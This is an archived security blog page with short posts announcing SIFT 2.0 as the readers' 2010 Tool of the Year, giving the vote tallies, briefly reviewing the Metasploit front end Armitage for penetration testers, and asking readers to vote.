As voted by you, the readers, the 2010 Toolsmith Tool of the Year is SIFT 2.0.
The SANS Investigative Forensic Toolkit (SIFT) Workstation Version 2.0, as discussed in May's ISSA Journal, is a Linux distribution that is preconfigured for forensic investigations. Created by Rob Lee for the SANS 508 track, SIFT 2.0 includes all the tools a forensic analyst/incident responder would require to conduct a thorough system investigation. I particularly favor it for memory analysis - grab a memory image from your victim system; pull it back to your SIFT VM and get down to business in no time flat.
Of 76 votes, SIFT 2.0 came in first with 24 votes (31.6%).
Rounding out the top five:
2) Firefox Addons for Security Practitioners with 20 votes (26.3%)
3) SamuraiWTF with 18 votes (23.7%)
4) NetWitness Investigator with 12 votes (15.8%)
5) Confessor and MOLE with 8 votes (10.5%)
On behalf of the ISSA Journal and I, congratulations to Rob Lee and his team!
del.icio.us | digg | Submit to Slashdot
Please support the Open Security Foundation (OSVDB)
Monday, January 31, 2011
Monday, January 03, 2011
toolsmith: Armitage - Cyber Attack Management for Metasploit
Raphael Mudge's Armitage is the subject of January 2011's toolsmith in the ISSA Journal.
Armitage is a "cyber attack management" platform for Metasploit.
Depending on your background or the availability of commercial tools in your environment (Core, Canvas, etc.), your comfort with Metasploit likely varies
with the depth of your experience. Armitage1 is designed to help close some of the experience or comfort gaps, described by the developer as useful for “non-hackers”.
For use as a demonstration tool to elucidate vulnerabilities and their exploit to management or customers, Armitage is excellent.
Basic Armitage workflow (should be familiar to all pentesters):
Create a workspace, conduct or import scans, identify vulnerabilities, determine appropriate attacks, gain access, and further your presence in the environment.
I've always loved the premise of attack pivoting. Gain a foothold on one system, them jump off to another host or network. Armitage definitely supports such thinking. ;-)
Download Backtrack 4 R2, install Armitage, and see what you think. I enjoyed testing it for this article immensely; I believe you'll find it equally useful.
Download the article here.
Cheers.
del.icio.us | digg | Submit to Slashdot
Please support the Open Security Foundation (OSVDB)
Saturday, January 01, 2011
Help choose the 2010 Toolsmith Tool of the Year
Rather than choose the best of 2010 myself, I need your help choosing the 2010 Toolsmith Tool of the Year.
We covered a lot of excellent information security-related tools in 2010; which one did you believe was the best?
I appreciate you taking the time to make your choice here.
Results will be announced February 1, 2011.
We covered a lot of excellent information security-related tools in 2010; which one did you believe was the best?
I appreciate you taking the time to make your choice here.
Results will be announced February 1, 2011.
Subscribe to:
Posts (Atom)
Moving blog to HolisticInfoSec.io
toolsmith and HolisticInfoSec have moved. I've decided to consolidate all content on one platform, namely an R markdown blogdown sit...
-
Continuing where we left off in The HELK vs APTSimulator - Part 1 , I will focus our attention on additional, useful HELK features to ...
-
As you weigh how best to improve your organization's digital forensics and incident response (DFIR) capabilities heading into 2017, cons...
-
When, in October and November 's toolsmith posts, I redefined DFIR under the premise of D eeper F unctionality for I nvestigators in R ...